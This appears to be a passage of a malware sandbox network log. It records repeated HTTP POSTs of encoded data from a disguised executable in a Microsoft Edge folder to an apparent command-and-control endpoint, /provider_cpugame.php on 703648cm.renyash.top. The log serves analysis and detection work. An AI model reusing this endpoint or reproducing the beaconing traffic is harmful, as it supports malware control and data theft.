                                                                                                                      Dec 20, 2024 21:18:14.301291943 CET2644OUTData Raw: 5d 5a 5a 54 5d 5a 51 54 5a 5b 5b 52 55 56 51 56 58 59 59 48 52 5d 54 54 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]ZZT]ZQTZ[[RUVQVXYYHR]TT][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B*,=3"'9.8&4*^*4'$(?1/'(8")U'>#G!"^,#
                                                                                                                      Dec 20, 2024 21:18:15.219918966 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:15.452478886 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:13 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      27192.168.2.44979537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:15.699909925 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:16.051325083 CET2644OUTData Raw: 5d 5b 5f 57 58 5a 51 57 5a 5b 5b 52 55 51 51 57 58 52 59 40 52 5d 54 59 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][_WXZQWZ[[RUQQWXRY@R]TY][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"><*%Z'.:,;_!:1)$3%*!$%+8\"!R0#G!"^,?
                                                                                                                      Dec 20, 2024 21:18:16.977648973 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:17.222526073 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:15 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.44980137.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:17.469024897 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:17.816786051 CET2644OUTData Raw: 58 58 5f 51 58 5a 54 56 5a 5b 5b 52 55 5e 51 55 58 53 59 43 52 53 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_QXZTVZ[[RU^QUXSYCRST^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!G+>,?3'X6].]64>^='$0(S(T/U%<611V0>#G!"^,
                                                                                                                      Dec 20, 2024 21:18:18.739430904 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:18.972843885 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:17 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.44980737.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:19.217680931 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:19.566967964 CET2644OUTData Raw: 58 5d 5f 55 58 5b 54 52 5a 5b 5b 52 55 56 51 52 58 5c 59 49 52 53 54 54 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X]_UX[TRZ[[RUVQRX\YIRSTT][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!G)=0=1[$.\-;* 9&*$'6(102+3"&.#G!"^,#
                                                                                                                      Dec 20, 2024 21:18:20.524444103 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:20.760865927 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.44981037.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:21.023091078 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:21.379365921 CET2644OUTData Raw: 5d 5d 5f 50 58 5b 54 5f 5a 5b 5b 52 55 54 51 57 58 5b 59 46 52 52 54 55 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]]_PX[T_Z[[RUTQWX[YFRRTU][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!B>.?Y)3.$>6]:]5\#\:^>B#]0(%W(8%8?#19'#G!"^,+
                                                                                                                      Dec 20, 2024 21:18:22.286041021 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:22.520458937 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:20 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.2.44981537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:22.764338970 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:23.114018917 CET2644OUTData Raw: 5d 59 5f 53 5d 5e 54 52 5a 5b 5b 52 55 5e 51 51 58 53 59 45 52 5d 54 5d 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]Y_S]^TRZ[[RU^QQXSYER]T]][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=+]=9&=%:;5X#>)4$(5?";W'(#!2>'#G!"^,
                                                                                                                      Dec 20, 2024 21:18:24.035455942 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:24.268378973 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:22 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.2.44982037.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:24.515882015 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:24.863795996 CET2644OUTData Raw: 58 5d 5f 50 5d 56 51 53 5a 5b 5b 52 55 51 51 5c 58 5c 59 43 52 55 54 58 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X]_P]VQSZ[[RUQQ\X\YCRUTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!>./\=$.&X.-^!*>]$((<&<"!$>#G!"^,?
                                                                                                                      Dec 20, 2024 21:18:25.785172939 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:26.024467945 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:24 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.2.44982537.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:26.425219059 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:26.769907951 CET2644OUTData Raw: 58 58 5f 50 5d 58 54 56 5a 5b 5b 52 55 54 51 52 58 5e 59 48 52 53 54 5a 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XX_P]XTVZ[[RUTQRX^YHRSTZ][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\">7X*3$Y:])X4*")$$0*?8&8,51'#G!"^,+
                                                                                                                      Dec 20, 2024 21:18:27.705432892 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:27.944400072 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:25 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.2.44983237.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:28.189313889 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:28.535698891 CET2644OUTData Raw: 58 51 5f 52 5d 5c 54 5f 5a 5b 5b 52 55 53 51 56 58 58 59 45 52 5d 54 59 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XQ_R]\T_Z[[RUSQVXXYER]TY][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!*>7]* !$&,;*#\2_>$70-T+2 1;'!""&.#G!"^,7
                                                                                                                      Dec 20, 2024 21:18:29.460345984 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:29.692967892 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:27 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      35192.168.2.44983737.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:29.945365906 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:30.301321030 CET2644OUTData Raw: 5d 5b 5a 54 5d 59 54 57 5a 5b 5b 52 55 53 51 55 58 5a 59 42 52 56 54 5a 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][ZT]YTWZ[[RUSQUXZYBRVTZ][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!=X0* 1$.!:- *"*4'5??28X#29S0#G!"^,7
                                                                                                                      Dec 20, 2024 21:18:31.216609001 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:31.452639103 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:29 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.2.44984137.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:31.699870110 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:32.051305056 CET2644OUTData Raw: 58 5e 5f 53 5d 59 54 50 5a 5b 5b 52 55 53 51 50 58 58 59 43 52 52 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: X^_S]YTPZ[[RUSQPXXYCRRT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"+=4>-[').]%]#\:)'?$=R<$%(<!25U&>#G!"^,7
                                                                                                                      Dec 20, 2024 21:18:32.982517958 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:33.216399908 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:31 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.2.44984737.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:33.468581915 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:33.816795111 CET2644OUTData Raw: 5d 59 5a 53 5d 5c 54 5e 5a 5b 5b 52 55 5e 51 51 58 53 59 49 52 54 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ]YZS]\T^Z[[RU^QQXSYIRTT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!*=#Y>['>91!:&^)'?Y'+5S?P%0!2!V0>#G!"^,
                                                                                                                      Dec 20, 2024 21:18:34.744961023 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:34.972865105 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:32 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.2.44985337.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:35.216583014 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:35.566787004 CET2644OUTData Raw: 5d 5b 5a 55 58 59 51 54 5a 5b 5b 52 55 56 51 5c 58 5c 59 43 52 53 54 5e 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: ][ZUXYQTZ[[RUVQ\X\YCRST^][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!F*X4?3]&=6.(5\7*X>B?'5?"?T2#1)0>#G!"^,#
                                                                                                                      Dec 20, 2024 21:18:36.501358986 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:36.736659050 CET158INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:34 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.2.44985937.44.238.250807664C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 20, 2024 21:18:36.982429981 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:37.332729101 CET2644OUTData Raw: 5d 5d 5a 54 58 5c 54 5f 5a 5b 5b 52 55 5e 51 5d 58 59 59 49 52 53 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
